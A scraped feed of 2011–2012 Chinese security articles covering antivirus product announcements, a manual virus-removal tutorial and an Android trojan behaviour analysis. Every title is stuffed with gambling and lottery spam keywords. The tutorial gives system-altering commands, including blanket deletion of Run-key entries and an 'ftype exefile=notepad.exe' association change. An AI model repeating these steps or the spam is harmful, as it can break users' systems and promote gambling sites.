/></strong></p><p><strong>高灵敏轻量级防御架构,即时秒杀威胁</strong></p><p>我们重新构建了文件监控防御架构,大大提升了实时防御的灵敏度,能够实时捕捉病毒威胁,预防效果更出色;同时,新的防护体系还进一步减少了对系统资源的占用,杀毒4.0的总体性能提升30%以上,电脑轻快不卡机。</p><p><strong><br /></strong></p><p><strong>全新“云动”界面,杀毒软件也性感</strong></p><p>前所未有的清爽,灵动优美的体验!颠覆杀毒软件刻板枯燥的传统形象,为您带来简洁而不简单的操作体验。</p><p>1)轻盈的单一窗口界面,彻底摆脱标签页的束缚。<br /><img src="http://p7.qhimg.com/t01538d182a3e5ea58e.png" alt="" /><br /></p><p>2)点击下拉箭头,即可展开防护状态窗口,所有防护组件状态一目了然。您还可以根据自己的需要来调整防护状态。</p><p><img src="http://p2.qhimg.com/t01fb4317489931bc24.png" alt="" /><br /></p><p>3)点击主界面右下角的“更多”按钮即可向右滑出工具大全扩展窗口,并且可以从工具大全中随意拖拽工具到主界面右下角区域,以便快捷使用。</p><p><img src="http://p3.qhimg.com/t0176ca4af4389e6ec4.png" alt="" /><br /></p><p>4)可塑性超强的换肤模型。您可以根据自己的喜好来挑选或是制作惊艳、多变的皮肤。</p><p><br /><img src="http://p1.qhimg.com/t01eedbe10c296315c8.png" alt="" /><img src="http://p0.qhimg.com/t01304172c5131fe55c.png" alt="" /><img src="http://p4.qhimg.com/t012cd2d6460d104799.png" alt="" /><strong><br /><br />加强版沙箱,看片更安全</strong><br />想看片又怕中毒?加强版隔离沙箱为您提供百毒不侵的安全体验,运行风险程序不感染真实系统,新增“断网模式”保护隐私不侧漏。<br /><img src="http://p1.qhimg.com/t01df3215cd2f52e8a7.png" alt="" /><strong><br /><br />两大知名反病毒引擎双剑合璧</strong><br /></p><p>智能引擎调度技术升级,可选同时开启小红伞和BitDefender两大知名反病毒引擎,双剑合璧查杀监控更凌厉。</p><p><br />更多的其他功能和技术亮点,欢迎您亲自下载体验。</p> [安全产品]使用腾讯手机管家电脑版给你的手机查杀病毒-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/16073_1.html 佚名 安全产品 2012/7/5 22:24:48 <p>本来用起来好好的Android手机突然间让人感觉变卡了,怀疑手机可能中毒但却拿不出实质的证据。其实,要看看手机是否中毒“病”倒了,让“大夫”腾讯手机管家PC版帮您的手机做个安全体检就一清二楚。 </p><p>{insd m=&quot;0&quot; i=&quot;33281&quot;}</p><p><strong>腾讯手机管家PC版安全体检功能有什么用?</strong> </p><p>腾讯手机管家PC版安全体检功能,顾名思义,就是帮您的Android手机把把脉,诊一下手机是不是安装了恶意应用导致被无端端扣费,诊一下是不是开了太多的应用占用了内存导致运行不顺畅,诊一下现在的Android系统是不是还能变得更健康跑得更快。</p><p><strong>手机安全体检——保持手机最佳状态</strong> </p><p>怀疑手机中毒变卡的话,那就马上让腾讯手机管家帮手机做个手机安全体检吧。体检方法很简单,让手机跟腾讯手机管家PC版连接之后,点击腾讯手机管家PC版首页主界面上大大的“安全体检”绿色按钮(图1),即可进行手机体验。</p><p>&nbsp;<img src="https://pic.cr173.com/up/2012-7/2012070522284195279.jpg" alt="" /></p><p>图1 腾讯手机管家PC版上大大的的“安全体检”绿色按钮</p><p>点击“安全体检”绿色大按钮之后,“大夫”腾讯手机管家PC版马上给您心爱的Android手机进行包括应用检测、进程扫描在内的多项扫描操作(图2)。</p><p>&nbsp;<img src="https://pic.cr173.com/up/2012-7/2012070522284192343.jpg" alt="" /></p><p>图2 腾讯手机管家PC版对手机进行安全体检的过程</p><p>稍等片刻之后(体检时间随手机安装应用数量的增加而增加),腾讯手机管家PC版随即给出一份比较详细的手机体检报告,这份体检报告不像某些大医院给出的体检报告那样令人看得头晕,反而刚好相反让人一看就懂!</p><p><img src="https://pic.cr173.com/up/2012-7/2012070522284152820.jpg" alt="" /></p><p>&nbsp;图3 腾讯手机管家的体检报告让人一看就懂</p><p>体检报告中的可优化项目、推荐项目和已完成项目列得清清楚楚(图3),让您对您的手机的健康状况有个最基本了解。如果您的Android手机安装了腾讯手机管家(手机版),还能对手机进行深度扫描安全体检。</p><p>当您选择对手机进行一键优化之后,腾讯手机管家PC版会显示你的手机健康状况为良好(图4),此时也证明你的手机无病无痛,非常健康。如果觉得手机还不够健康,还能再重新扫描一次。 </p><p>&nbsp;<img src="https://pic.cr173.com/up/2012-7/2012070522284197688.jpg" alt="" /></p><p>&nbsp;图4 腾讯手机管家PC版显示手机健康状况良好</p><p><strong>总结</strong> </p><p>在没有安装安全优化类应用的情况下,手机在使用过程中难免打开了太多的应用导致系统变卡变慢,也难免会安装了恶意应用导致手机中毒了。不管你的手机遇上什么疑难杂症,建议先让腾讯手机管家PC版帮您的手机做个体检吧,这样才能对症下药。 </p> [防护教程]金山火眼发布 帮助用户在线检测exe文件是否病毒-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/15975_1.html 佚名 防护教程 2012/6/28 14:35:17 <p>金山网络发布了其最新产品“火眼”的1.2.3α版本,本次更新包括了对一些病毒的识别能力的提高、增加微博分享以及修复一些bug等功能。<br />同时,火眼将在每周三进行一次更新。火眼是一款在线的自动分析文件行为的一个在线沙箱,可以清晰地看到可执行文件的每一个运行中的行为。<br /><br /><img src="https://pic.cr173.com/up/2012-6/20126628281436412286.jpg" alt="" /></p><p>以下为更新内容:<br /><strong>重点推荐内容</strong><br />1,增强对QQ粘虫隐藏窗口的识别 (点我看报告)<br /><img alt="" src="https://pic.cr173.com/up/2012-6/2012062814360930719.jpg" />&nbsp;<br />2,增强对QQ盗号木马的识别(点我看报告)<br /><img alt="" src="https://pic.cr173.com/up/2012-6/2012062814361083042.jpg" />&nbsp;<br />3,新增微博分享功能<br /><img alt="" src="https://pic.cr173.com/up/2012-6/2012062814361065953.jpg" />&nbsp;<br /><img alt="" src="https://pic.cr173.com/up/2012-6/2012062814361020557.jpg" />&nbsp;<br /><br /><strong>其他修改</strong><br />1. 添加ShowWindow函数的监控;<br />2. 增加隐藏窗口行为的解析;<br />3. 优化后台数据结构,大幅提升访问速度;<br />BUG修复:<br />1. 修复PATCH模块导致带有自校验的样本异常退出的BUG;<br />2. “傲游浏览器”拼写错误的修正;</p> [系统安全]360杀毒引擎怎么改为小红伞引擎?-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/15569_1.html 西西 系统安全 2012/6/1 12:20:18 <p>今天早上西西打开电脑上网,忽然发现自己电脑的时间变为2011年6月1日了,可是今天明明是2012年的六一儿童节哦。只好手工把时间改为了2012年。<br /><br />后来从360官方论坛发现,原来也还有其他朋友的电脑的时间也退回到了2011年,据官方解释,可能是由于杀毒软件BD引擎造成的,<span style="color:#cc0000;">使用360杀毒的用户建议把360杀毒引擎改为小红伞引擎</span>。<br /><br />哪怎么把360杀毒引擎怎么改为小红伞引擎呢?<br /><br />请看西西的图文教程。<br /><br />1、先切换到专业模式:<br /><br /><img src="https://pic.cr173.com/up/2012-6/201261122815.jpg" alt="" /><br /><br />2、点击左下角的引擎连接:<br /><br /><img src="https://pic.cr173.com/up/2012-6/201261122041.jpg" alt="" /><br /><br />3、多引擎设置:<br /><br /><img src="https://pic.cr173.com/up/2012-6/201261122227.jpg" alt="" /><br /><br />4、把BitDefender常规查杀引擎改为小红伞常规查杀引擎:<br /><br /><img src="https://pic.cr173.com/up/2012-6/201261122940.jpg" alt="" /><br /><br />5、OK了,这样就把360杀毒引擎改了哦。<br /></p> [系统安全]电脑中病毒后怎么手动清除教程-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/15388_1.html 佚名 系统安全 2012/5/21 10:18:11 <div>一、检查注册表启动项<br /><br />大多病毒都会进入注册表启动项的,我们可以通过一些方法查看和删除。打开注册表HKEY_LOCAL_MACHINE\SOFTWARE&nbsp;\Microsoft\Windows\CurrentVersion点击查看其中RUN中的内容,如果不懂,把里面的东西就全删了。不过这样并不能解决病毒,病毒还会重新写入的,不过到时可以解决木马。如果想手工杀毒,就接着看下面的文章吧!<br /></div><div></div><div></div><p><br /></p><div>二、解决不能查看隐藏文件的方法</div><div>1、有时病毒通过修改注册表和修改文件属性(伪造CheckedValue值)的方法来达到不能查看隐藏文件的目的,这是可是打开修改注册表,找到&nbsp;&nbsp;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer&nbsp;\&nbsp;&nbsp;Advanced\Folder\Hidden\SHOWALL,删除CheckedValue键(该键当前为字符串类型),新建&nbsp;CheckedValue为DWORD值(正确的键为DWORD类型),修改值为1,系统隐藏文件就会显示了,恢复正常。<br /></div><div>2、也可以通过ATTRIB命令使文件去掉隐藏和系统的属性。例如显示C盘根目录下文件,就可以在CMD命令提示符下输入CD\命令切换到根目录下,然后输入ATTRIB&nbsp;-S&nbsp;-H&nbsp;AUTORUN.INF命令就可以了<br /></div><div></div><p><br /></p><div>三、怎样删除病毒的主体文件<br />&nbsp;&nbsp;&nbsp;&nbsp;病毒都是有主体文件的,我们要手工杀毒首先就要清除病毒的主体文件,主体文件一般都是DLL文件,直接删是无法删除的,我们可以试试一下的方法(目前还没有发现什么DDL&nbsp;&nbsp;文件不能被这三种方法删除的)。<br /><br />1、进入安全模式删除<br /><br />2、用windows系统自带的Rundll32.exe卸载后再删除,这一招对付wmpcd32.dll是很灵验的。在命令提示符下输入:Rundll32.exe&nbsp;文件名.DLL&nbsp;Uninstall<br /><br />3、找出这个DLL文件的寄宿。方法:要使用一款名为procexp进程管理工具,点击find,再点击find&nbsp;DLl,打开DLL文件查找对话框,在DLL&nbsp;Substring中输入“文件名.DLL”.点击&nbsp;&nbsp;&nbsp;Search按钮就可以看到DLL文件被哪个进程调用了,只要结束这些进程,再尝试删除DLL文件就可以了。</div><div>注:如病毒文件为RGWatch.sys的也可以使用同样的方法找出寄宿进程,然后再删掉。此外冰刃也是个不错的选择。<br /></div><p><br /></p><div>四、删除注册表病毒垃圾<br />&nbsp;&nbsp;&nbsp;&nbsp;这个没什么好说的,就是在我们手工杀完毒后别忘了删除其所在注册表留下的一些信息。方法:打开注册表(regedit),搜索我们要删除的病毒名即可。有时候我们无法删除,<br />可以使用冰刃强行删除。因为冰刃没有注册表修改搜索功能,我们可以先在注册表编辑器中搜索出相关项,再在冰刃的注册表中定位到搜索项目,然后删除!<br /></div><p><br /></p><div>五、找到病毒保护文件,强行删除!<br /><br />很多病毒都会产生保护文件的,当你删出病毒后,病毒又会回来,很烦人,也很难办!我们可以使用下面的方法找出其保护文件,在这里需要两款辅助工具:Filemon和冰刃。&nbsp;&nbsp;Filemon的作用是记录下对所有文件的添加、修改和删除记录,并且可以显示是哪个进程进行的修改!<br /></div><div>方法操作如下:打开冰刃,在设置里选择“禁止进/线程建立”,打开进程,结束所有无用进程(结束explorer.exe进程),只留下系统基本进程(不包括explorer.exe进程)一—方便我们详细记录。逐一删除注册表启动项目,并且刷新查看是否会自动恢复。在Filemon中就会发现这个保护进程了!<br /></div><p><br /></p><div>六、杀毒软件被禁用的解决方法<br />&nbsp;&nbsp;&nbsp;&nbsp;杀毒软件是病毒的克星,所以病毒要想生存就必须杀掉杀毒软件。这也是现在很多病毒都具备的功能,也就是中毒后杀毒软件不可用了。<br />&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;1、比较普遍的杀毒软件中毒现象是会提示:应用程序正常初始化(0x00000ba)失败。<br /></div><div><strong>原因分析:</strong><br />&nbsp;&nbsp;&nbsp;ws2_32.dll是windows&nbsp;sockets应用程序接口,用于支持Internet和网络应用程序,程序运行时会自动调用ws2_32.dll文件。ws2_32.dll是个动态链接库文件,位于系统文件夹中,windows在查找动态链接库文件时,会现在应用程序当前目录搜索,如果没有找到才会搜索windows所在目录,如果还没有找到就会搜索&nbsp;system32和system目录。一些病毒就<br />是利用此原理在杀毒软件目录中建立了ws2_32.dll文件或文件夹,在杀毒软件看来这是一个它需要的文件而调用,但事实上这个所谓的“文件”又不具真<br />正的ws2_32.dll文件所具备的功能,所以杀毒软件也就无法正常运行了,于是就会提示:应用程序正常初始化(0x00000ba)失败!<br /><strong></strong></div><div><strong>解决办法:</strong><br /><br />到杀毒软件安装目录找&nbsp;ws2_32.dll文件或文件夹,删除即可!<br />注:如果找不到,可能是隐藏了,按照上面说的方法即可解决。如果找到后仍无法删除,原因是里面有个名为1.的文件夹,该文件夹对于windows环境无法识别,此时可以用冰刃删除<br /></div><div>&nbsp;&nbsp;&nbsp;2、IFEO劫持(冰刃等杀病毒工具不可用)<br />&nbsp;&nbsp;<br />貌似冰刃是病毒的一个大危害,病毒自然也不会放过。有时候中毒后,所有杀毒软件和反病毒工具(比如冰刃)都无法使用了,原因就是IFEO劫持。原因:<br /><br />通过修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows&nbsp;NT\CurrentVersion\Image&nbsp;File&nbsp;Execution&nbsp;Options下建立特定的子键来屏蔽一些特定的程序,或指向<br />目标程序,来达到启动病毒和禁用工具的目的。<br />&nbsp;&nbsp;</div><div><strong>解决方法:</strong>到此目录下,把我们的工具从黑名单里拖出来就可以了(删掉呗)<br /></div><p><br /></p><div>七、重装系统都无法解决的病毒问题<br />&nbsp;&nbsp;&nbsp;&nbsp;很多人认为中病毒了,重装系统就可以解决了,其实不然,有些病毒强制修改IE,设置默认首页,即使你重装了系统后仍然无法解决。方法是:把java虚拟机停掉后病毒就不会<br />发作了,然后再结束进程。<br /><br /><strong>具体步骤:</strong>在internet选项中,把有关java的vm的启动项全部去掉即可。</div> [安全产品]360安全卫士8.6beta3新增注册表清理独立应用-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/14798_1.html 西西 安全产品 2012/3/6 18:06:41 <p>360安全卫士8.6beta3版本发布,该版本将注册表独立了出来,并在安全性方面做了很大的优化,下面跟随笔者一起体验下新版360卫士的注册表清理功能到底有何不同。</p><p><strong>1.新版部分功能安装后需重启方可使用&nbsp;</strong></p><p>360安全卫士8.6beta3版的安装和以往略有不同,部分功能(主要是注册表清理)需要重启后方可使用,如图(1)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084779787.jpg" /></p><p>图(1)</p><p>未重启的机器清理注册表功能是无法加载成功的,如图(2)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084784868.jpg" /></p><p>图(2)</p><p>注册表清理和一键清理、清理垃圾等功能一样成为一个独立的部分,重启后注册清理功能可正常使用,如图(3)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084728783.jpg" /></p><p>图(3)</p><p><strong>2.注册表清理更安全、人性化&nbsp;</strong></p><p>360安全卫士旧版亦有注册表清理功能,不过默认一键清理不包含注册表清理,但其注册表的默认清理选项并不太完善,只是笼统的将扫描出的注册表问题一律清理掉,8.5beta版的注册表清理扫描结果如图(4)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084785132.jpg" /></p><p>图(4)</p><p>8.6beta3版的注册表清理更加安全,只默认清理确实无用的注册表项,对于8.5beta版中的某些选项提示谨慎清理,如图(5)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084813226.jpg" /></p><p>图(5)</p><p>清理结果也较之前版本少了许多,如图(6)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084880265.jpg" /></p><p>图(6)</p><p>注册表清理有风险,在清理之前最好对其进行备份。360安全卫士的注册表清理功能在执行完清理后会自动对注册表进行备份,点击还原即可将注册表还原到之前模样,简单安全,如图(7)所示:</p><p><img alt="" src="https://pic.cr173.com/up/2012-3/2012030618084852486.jpg" /></p><p>图(7)</p><p><strong>总结:&nbsp;</strong></p><p>360安全卫士8.6beta3的注册表清理更加的安全、人性化,注册表清理选项的选择更加的谨慎安全;注册表清理完成后自动备份功能确保注册表安全无忧。</p> [防护教程]QQ电脑管家保护用户隐私三部曲-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/14459_1.html 西西 防护教程 2012/2/9 17:57:22 <p>自从去年发生了多起隐私泄露事件之后,保护隐私越来越被广大互联网用户所重视。保护隐私的方法其实有很多种,例如清除上网痕迹、给文件夹加密、安装安全防护软件等等。看起来似乎有些繁琐,其实用QQ电脑管家就可以全部搞定了。 </p><p><strong>清除使用痕迹中的隐私信息</strong></p><p>在计算机运行的过程中,为了方便用户再次使用,系统或程序往往会自动保存用户操作的历史记录,比如浏览过的网页、看过的电影节目、编辑过或者打开过的文档等,这些记录就是你的使用痕迹。</p><p>使用痕迹可能包含了你的个人隐私信息,一旦其他人使用我们的电脑,就有可能通过历史使用痕迹获取你的个人隐私。因此,定期清理使用痕迹可以有效地保护个人隐私,防止他人根据使用痕迹来了解你的上网操作。</p><p>在QQ电脑管家的“系统优化”中有“清除痕迹”的入口,点击“查看详情”即打开“清除痕迹”功能窗口。</p><p><br /><img alt="" src="https://pic.cr173.com/up/2012-2/2012020917584764174.jpg" /></p><p>打开QQ电脑管家清除痕迹功能</p><p>选择要清除的使用痕迹,点击右下角的“开始扫描”。</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020917584865443.jpg" /></p><p>扫描要清除的痕迹</p><p>扫面完成之后会列出使用痕迹,再次确认需要清理的项目,点击右下角的“立即清理”即可。</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020917584822043.jpg" /></p><p>清除扫描出的使用痕迹</p><p><strong>小提示:</strong></p><p>QQ电脑管家可以删除的使用痕迹比较全面和细致,但并是将所有痕迹都清除就是最好的方式。因为有些“痕迹”可以记录我们的使用习惯,一旦清除,再用到时就要重新设置,反而给使用带来了不便。所以建议大家在选择要清除的使用痕迹时,尽量不要“全选”,而是点击“推荐选项”,QQ电脑管家会帮你保留那些有益无害的痕迹。<br /><br />QQ电脑管家2012新春版:<a href="http://www.pjyuanjian.com/soft/11253.html">http://www.pjyuanjian.com/soft/11253.html</a></p> [病毒漏洞]安卓“推箱子”带木马 安全管家Hold住-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/14448_1.html 西西 病毒漏洞 2012/2/9 9:01:26 <p>专业手机杀毒软件<a href="http://www.pjyuanjian.com/soft/33687.html" target="_blank">安全管家</a>查杀安卓 “推箱子木马”,将恶意代码内嵌到“推箱子”手机游戏软件中,发布在安卓各个市场和论坛,进行扩散。</p><p>木马恶意行为:</p><p>“推箱子木马”私自下载流氓软件并静默安装(流氓软件为伪装的谷歌地图),且无法删除流氓软件,并将手机的IMSI、IMEI、手机号码上传至病毒服务器。</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020909023439912.gif" /><br /></p><p>木马行为分析:</p><p>“推箱子木马”在电话信号强度,电量变化,开机自启三个广播接收后启动服务UpdateService执行恶意行为。</p><p>&nbsp;&nbsp;&nbsp; 1.如果手机已经ROOT,该软件会请求获取ROOT权限,从而更进一步的触发流氓行为,&nbsp;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;2.如果手机未打开USB调试功能,则该软件会误导用户打开USB调试功能,以便为其下一步操作做准备,表现如下:</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020909023531332.gif" /><br /></p><p>&nbsp;&nbsp;&nbsp; 3.该软件会请求网络连接,判断是否可以正常连接网络,</p><p>&nbsp;&nbsp;&nbsp; 4.一旦网络链接成功,即可从流氓服务器下载流氓软件,并将该流氓软件存放在SD卡根目录下,命名为“idb.apk”。即使用户将该文件删除,该流氓软件依然会重新下载。</p><p>&nbsp;&nbsp;&nbsp; 5.流氓软件被下载后,会被安装到ROM中,即路径/system/app/路径下,在此可以看到下载的流氓软件包名为“com.google.map”,属于盗版的谷歌地图软件。</p><p><img alt="" src="https://pic.cr173.com/up/2012-2/2012020909023520906.gif" /></p><p>温馨提示:</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在安卓手机游戏中内嵌恶意代码的行为是手机病毒制造者最常采用的行为之一,安全管家提示用户:安装软件要慎重,</p><p>用户可以下载安装手机杀毒软件-<a href="http://www.pjyuanjian.com/soft/33687.html" target="_blank">安全管家</a>,利用病毒查杀功能,进行病毒检测和删除。安全管家病毒检测中心人员建议,用户需及时更新病毒库,定期给手机进行体检,确保手机安全使用。<br /><br />安全管家安卓版:<a href="http://www.pjyuanjian.com/soft/33687.html">http://www.pjyuanjian.com/soft/33687.html</a></p> [安全产品]QQ手机管家创立六大手机安全标准 保护用户隐私-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/14205_1.html 西西 安全产品 2012/1/14 17:57:48 <p>近日,一条有关丢失iPhone 4s丢失的微博在网络上热转,一女生捡到iPhone 4s手机之后,没有物归原主,反而兴致勃勃地玩起自拍,可没料到,此手机的icloud云服务功能,自动将照片同步到了云端的照片流里,然后又同步给了失主。于是,失主同时发现了此“捡拾者”用iPhone 4s自拍的照片,并将照片上传到了网上。</p><p><img alt="" src="https://pic.cr173.com/up/2012-1/2012011417550113221.jpg" /></p><p>这个“微博事件”再次引发用户对智能手机隐私安全问题的思考:随着智能手机的用户越来越多,用户手机上的个人隐私内容也越来越多,包括私密短信、自拍照片、视频等等,而智能手机又与网络无缝对接,意味着隐私数据随时都有泄露危险,隐私保护迫在眉睫。</p><p>有调查数据显示超过三分之一的用户在使用智能手机时最担心隐私信息泄漏,其次是安全问题占26%。毕竟智能手机强大的拍照、摄像、联网功能,因此包含了使用者大量个人隐私,一旦泄露将惹来大麻烦。所以想办法杜绝手机隐私泄露变得至关重要。</p><p>网络隐私泄露已经司空见惯,而且许多案例都刺痛我们的神经。“X卧底”窃听软件、手机丢失遭遇艳照门、CIQ偷窥用户隐私、CSDN等网站用户账户信息泄露……<br /><br /><strong>QQ手机管家打造隐私保护六大标准</strong></p><p>如果对手机隐私进行汇总和归类的话,应该包括手机联系人、通话记录、短信、照片、视频文档的丢失或者泄露,此外,手机病毒偷窥用户隐私,窃听电话,将手机用户重要资料偷偷上传至指定服务器也是手机隐私问题的重点。</p><p>对此,腾讯移动安全实验室工程师表示:“面对日益严峻的手机隐私安全问题,QQ手机管家已经拥有全面的对策,并且全球第一个发布了‘隐私安全保护’标准。目前QQ手机管家(Android)3.1已经全面支持六大隐私保护。”</p><p>其一,“隐私监控”标准。对于窃听类病毒软件,可以通过“防窃听”再配合“隐私监控”对每一款应用的运行实时监控;</p><p>其二,“手机防盗”标准。对于更多的手机丢失造成的信息泄露,QQ手机管家强大的“手机防盗”功能可以远程删除手机所有数据、远程锁机、手机定位,帮助用户保护手机隐私,也有很多用户通过QQ手机管家防盗功能找回了丢失的手机。</p><p>其三,“私密保护”标准。对于重要手机联系人短信和通话记录,则可以通过“私密空间”设置密码保护;</p><p>其四,“帐号保护”标准。手机令牌功能可以对QQ帐号登录保护,并保护Q币和游戏帐号等虚拟财产。</p><p>其五,“强化密码保护”标准。通过“密码强度验证器”可以帮助用户验证密码强度,保护网络帐号安全。</p><p>其六,“防丢失”标准。为了应对手机联系人和重要短信丢失,QQ手机管家的“通讯录备份”功能还可以实现网络存储,防丢失。</p><p>虽然智能手机时代隐私安全问题越来越严重,但并不意味着就没有解决方案。为手机下载安装专业的安全软件,并开启各类手机隐私保护功能,自然可以安心使用智能手机。同时,我们也呼吁相关立法机构加大对手机隐私保护立法的研究,呼吁手机安全厂商加大手机隐私保护功能研发力度,共同维护手机隐私安全。</p><p><strong>让人触目惊心的隐私泄露案例</strong></p><p>2009年8月10日央视《新闻30分》对手机窃听进行了报道,新闻中一款名叫“X卧底”的软件,除了具备一般监听功能外,还能安装在电脑上或手机上远程监控,哪怕是对方手机处于待机状态,周围的环境声也能听到,这让很多手机用户都不寒而栗。</p><p>2011年11月,曾经深陷艳照门的香港明星陈冠希又惹新艳照门事件,与16岁嫩模亲密照被泄露于网络。而该事件的起因在于嫩模手机丢失后,手机中的照片被曝光。虽然比不上2008年的艳照门风波,但是让很多爱拍一族,时刻担心手机丢失惹上麻烦。</p><p>2011年12月4日,有国外媒体报道一款名为“Carrier IQ间谍软件”的间谍软件被安装在众多知名品牌手机中,可以时刻监控手机用户的所有操作,并有可能将手机内容上传至网络,让手机用户对隐私泄露产生恐慌。</p><p>2011年12月21日,国内最大的程序员社区网站CSDN被爆出有超过600万用户的注册资料遭泄露。随后又曝出人人网、开心网、新浪微博等多家网站的用户信息也被泄露,这是有史以来最严重的网络隐私泄露事件,而互联网与移动互联网正在融合,手机网站隐私泄露问题也广受关注。<br /><br />各平台QQ手机管家:<a href="http://www.pjyuanjian.com/tags_QQ%CA%D6%BB%FA%B9%DC%BC%D2.html">http://www.pjyuanjian.com/tags_QQ%CA%D6%BB%FA%B9%DC%BC%D2.html</a></p> [系统安全]改变exe文件关联法手工清除顽固-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13833_1.html 西西 系统安全 2011/12/16 17:00:41 1、改变.exe文件的文件关联 命令:ftype exefile=notepad.exe %1<br /><br />2、重启系统判断记事本打开的所有文件,排除系统文件后。转到文件位置即可清除!<br /><br />3、恢复文件关联 <br /><br />右击任何文件选择“打开方式”选择CMD.exe 即可打开命令提示符窗口<br /><br />输入命令ftype exefile=%1 %* 即可恢复文件关联。<br /><br /><br /><br />总结手工杀毒步骤如下:<br />  1、手工下载并收藏所有SP5单个小文件(就win2k而言,合共已有近100M)<br />  2、断开网络<br />  3、重启到安全模式<br />  4、检查并清除【HLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*】各不明启动项键值<br />  5、检查并清除【HCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*】各不明启动项键值<br />  6、查不明服务并禁止之,如无,继续步骤7;如有,禁止后,回到步骤3。<br />  7、重点查【%SystemRoot%\system32\】目录下所有隐藏exe、com,检查其属性,不明来历者删无赦(可先放回收站,重启没事后再清除)。<br />  8、在更新最新病毒库后不妨用杀毒软件扫描系统盘所有文件一次。<br />  9、确认SP4已安装的基础上打全所有SP5补丁<br />  10、重启到正常模式使用<br />  注:由于判断是否非法程序需要一定经验,特提供一简单办法:点击可疑程式查阅【属性】,正常程式都在【版本】栏附带有公司名、版本、版权等信息,就算是3721、败毒等垃圾也带有相应的信息,而蠕虫、木马等程式则极大可能无任何信息可供查阅、参考,据此可判断大多数非法程序。 [安全产品]360杀毒3.0正式版 全面支持64位Windows操作系统-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13741_1.html souwiz 安全产品 2011/12/8 10:28:24 <p>我们今天发布了360杀毒3.0.0.2121正式版,为您带来强劲提速的全盘扫描,全面的64位支持,以及更快的启动速度。<br /><br /><span style="color:#ff0000;">360杀毒 64位下载地址</span>:<a href="http://www.pjyuanjian.com/soft/2513.html">http://www.pjyuanjian.com/soft/2513.html</a>&nbsp;(64位用户直接覆盖安装即可)<br /><br /><strong>全盘扫描智能加速,扫描时间缩短30%以上</strong><br />我们深知您的时间宝贵,因此在本版本引入了360安全中心最新的“SmartScan扫描智能加速”技术,为您带来强劲提速的全盘扫描体验。只要您进行过一次完整的全盘扫描,之后再次扫描时,平均扫描时间缩短30%以上。<br /><br /><img height="457" src="https://pic.cr173.com/up/2011-12/20111212881026452383.jpg" width="528" alt="" /><br /><br />32位下载地址:<a href="http://www.pjyuanjian.com/soft/2305.html">http://www.pjyuanjian.com/soft/2305.html</a></p><p><strong>更快的启动速度,更轻巧的资源占用</strong><br />新版本对360杀毒的防护服务架构做了大幅技术优化,360杀毒启动速度更快,并减少对电脑开机时间的影响。此外,新版本对360杀毒的资源占用进行了更进一步优化,您会发现360杀毒对系统CPU和内存的占用更轻巧了。<br /><br /><img height="458" src="https://pic.cr173.com/up/2011-12/20111212881026003830.jpg" width="528" alt="" /><br /><br /><strong>全面支持64位Windows操作系统</strong><br />随着新版本的发布,使用64位Windows操作系统的用户将可以同步体验360杀毒的全部功能。360杀毒的实时防护功能均已支持64位系统,并包含领先的原生64位驱动级虚拟隔离沙箱。<br /><br /><img height="457" src="https://pic.cr173.com/up/2011-12/20111212881025361689.jpg" width="527" alt="" /><br /></p> [安全产品]360安全卫士新增360云盘 新增圣诞皮肤!-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/13740_1.html 西西 安全产品 2011/12/8 9:37:40 <p><strong>hi~大家好<br /><br /></strong>  <strong>360安全卫士8.5beta版本发布,赶快来体验吧!</strong><br /><br />  <strong>发布版本</strong>:(<strong>v8.5.0.1001-beta</strong>)<br /><br />  <strong>下载地址:<a href="http://www.pjyuanjian.com/soft/2855.html">http://www.pjyuanjian.com/soft/2855.html</a><br /></strong><br />  <strong>主要功能更新如下</strong>:<br /><br />  <strong>【360云盘】New!每天限量发放体验资格!快快来体验吧!</strong><br /><br />  功能大全新增360云盘,可把珍藏的照片,工作的文档和美妙的音乐存在云盘,无需U盘即可让随时随地触手可及。<br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809390775123.jpg" /><br /><br />  <strong>【U盘防护】</strong><br /><br />  <strong>新U盘防护支持Windows7x64平台</strong><br /><br />  1、插入U盘时自动产生相应盘符的桌面图标,让您方便开启U盘与退出U盘;<br /><br />  2、提供安全退出的功能,让您退出U盘不再担心数据是否丢失。<br /><br />  <strong>【圣诞皮肤闪亮登场】</strong><br /><br />  <img alt="" src="https://pic.cr173.com/up/2011-12/2011120809390735600.jpg" /><br /><br />  <img alt="" src="http://t1.qhimg.com/qhimg/jingyan/450_21/22/01/03/2201039q4c8.b980ee.jpg" /><br /><br />  <strong>【开机小助手新增开机任务功能】</strong><br /><br />  繁忙的您,还在为开机后满桌面找不到需要打开的程序发愁吗?<br /><br />  